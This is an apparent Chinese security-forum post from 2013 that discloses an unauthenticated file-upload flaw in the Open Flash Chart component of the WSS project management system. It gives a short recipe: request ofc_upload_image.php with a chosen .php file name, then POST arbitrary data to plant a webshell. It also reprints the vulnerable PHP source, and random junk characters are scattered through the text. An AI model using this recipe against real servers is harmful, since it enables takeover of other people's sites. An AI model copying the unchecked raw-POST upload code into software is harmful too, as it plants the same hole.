找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2180|回复: 0
打印 上一主题 下一主题

WSS项目管理系统Post get shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:38:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
POST 数据漏洞文件执行任意后缀文件保存: ^6 S" M( I0 t7 l9 B! B
漏洞文件/chart/php-ofc-library/ofc_upload_image.php; o( ^& f# h& N6 G
8 O& S/ S% H: ?' D! Z3 L
利用:3 J* m; n) U% ~1 I' `# H7 l$ N! f
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
/ z5 M9 ]4 O1 ]8 I1 C" _0 T2 p* R' f
Post任意数据
- ~; F4 }- X- i2 f! p$ y; W: a保存位置http://localhost/chart/tmp-upload-images/hfy.php6 E9 G& k7 N: Y) \6 T
' V5 L, Z. L/ G6 A; U% a$ G' W
5 u. N' k7 l8 F* J/ R7 \/ I% F
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
3 g! m, o* G3 u, X; ?8 ]/ a- v6 H0 }6 R* k8 p' L$ d
<?php
0 i# j# _# n; u3 g0 B
" {; r# f( H4 l7 h//
# |" Q/ f# y  O/ A1 \: s- p' U// In Open Flash Chart -> save_image debug mode, you9 r) }. T9 B! G
// will see the 'echo' text in a new window.
) G" f0 f2 m# ^: v  o/ L. p//
2 ~( p6 K- P: [
% Y( w+ I! X  V8 ]- v' Y/*# A1 l* f9 _2 z- q, v
7 G: p3 Y8 J( O9 y! j3 P' r
print_r( $_GET );7 ^, \' s  A* f. N5 o+ d& |% a
print_r( $_POST );
( t* V9 M, p' H3 @print_r( $_FILES );
8 M4 {2 }1 M" z9 K
3 u  w+ q3 S# F) G* Yprint_r( $GLOBALS );
% z3 N' U5 j/ i) n2 a7 e2 _print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
" V/ G) C8 E8 x1 W
/ k! t  a. I* J8 R& U/ u) P*/9 s* Q8 \7 B- y, E7 T
// default path for the image to be stored //8 I  J3 Z! l( H! j2 o
$default_path = '../tmp-upload-images/';
4 d! @6 V/ e4 v2 O) A' r; ~+ x; k0 s1 `) p) C' H% v( d
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
4 Q0 t" F- U1 ~  k0 U6 k; u$ Z
// full path to the saved image including filename //- r# B. q8 Z) N* Y; r
$destination = $default_path . basename( $_GET[ 'name' ] );
6 _! k. }/ R/ f4 X& @! s6 T6 Z2 W( e' q3 [
echo 'Saving your image to: '. $destination;8 [: S1 t. L/ q+ O& v
// print_r( $_POST );  L* h0 _& m% I; f7 }
// print_r( $_SERVER );
/ e8 I+ U2 l8 E// echo $HTTP_RAW_POST_DATA;
3 }# h' Y$ X, P8 Z
' k: _& m# m  f+ D) z2 h' U//
5 |5 j2 I: d' x( K// POST data is usually string data, but we are passing a RAW .png& b8 I4 F  D8 y& g' n4 [
// so PHP is a bit confused and $_POST is empty. But it has saved
4 k, G* I* g" G" w# v' ~; B// the raw bits into $HTTP_RAW_POST_DATA
: V- o+ w! V( u. i$ ]# I7 X7 f0 k//! z+ e) P9 F$ ?
) r/ D9 k0 j( V: R' W" P5 \/ f
$jfh = fopen($destination, 'w') or die("can't open file");
" P' c+ Z9 z5 D. m- Ufwrite($jfh, $HTTP_RAW_POST_DATA);% x+ d3 f* m5 ^( I1 J) W
fclose($jfh);
) j7 w; T' u$ I1 O7 F. |" P' p, M% d0 q' X
//, M7 K9 V6 j& j+ P
// LOOK:' ~5 ~0 `8 r9 {3 g5 H/ a1 S
//
; {  I, F+ O2 v2 b( h. P) w( Oexit();6 I6 e+ S$ s% f3 R' _" |
//4 H( _; i2 r0 D
// PHP5:# d6 ^; H8 L; ]8 ~5 E
//
+ b8 l' ?# @, s$ V4 @  i5 I  D9 z7 S4 b9 {4 ^9 @8 }

6 _4 a/ h" f, O, G" q5 h// default path for the image to be stored //- U* i0 [" _9 O" C1 I* M
$default_path = 'tmp-upload-images/';
, G/ ~2 y3 b/ M; `5 v9 B* }2 s0 k- s4 t  F2 C  s6 E! i
if (!file_exists($default_path)) mkdir($default_path, 0777, true);  W/ M% }. J, j. N

3 b( ?; X: ^1 {# n: a: m, V// full path to the saved image including filename //
7 a  p5 m3 t$ G, S: Q% G5 S: Z% [, w$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
7 F6 s  J. S% p1 y8 P/ X! U' u
/ Z: r+ \$ p4 \% q# t// move the image into the specified directory //
% }- N  ?# {' H8 f4 Q* ]* H; bif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
  M3 H- D) a1 z" s' w    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";/ W/ t" o1 P6 D, _
} else {  S! K  c8 u; s  g# s& u
    echo "FILE UPLOAD FAILED";- k" E$ K3 b' G" E) B. |; i9 T8 D
}# _3 l$ P, u' Y8 ^1 `! ?) s' K

2 y( `# Y+ e. x  `$ o# W
5 W( a. o% J; F' l  R, s8 w( w?>, G8 N% O# L& u! ]2 w$ {

0 F5 K0 W3 k5 ^7 `7 j* E& m% n# y2 T$ z( `  M' \
$ u% T; y! ?, [/ S1 w4 `3 a- k. m" [6 Y% r, s

" O8 a) _6 c/ u& t3 ]3 k
& @6 Y  j9 N4 ?, [; O+ B& l# u9 `9 l- B
修复方案: % o: ~- q' w9 f0 T% V
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
8 `( T" J  h6 g$ J5 V$ [4 h8 o
3 Q+ c7 o& D; _+ A0 i( O4 v+ H# I( v" W" O  c- j
: y+ g2 g+ Z1 ?  U2 p  ]
6 ^/ _# b, e/ r" A1 E3 F

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表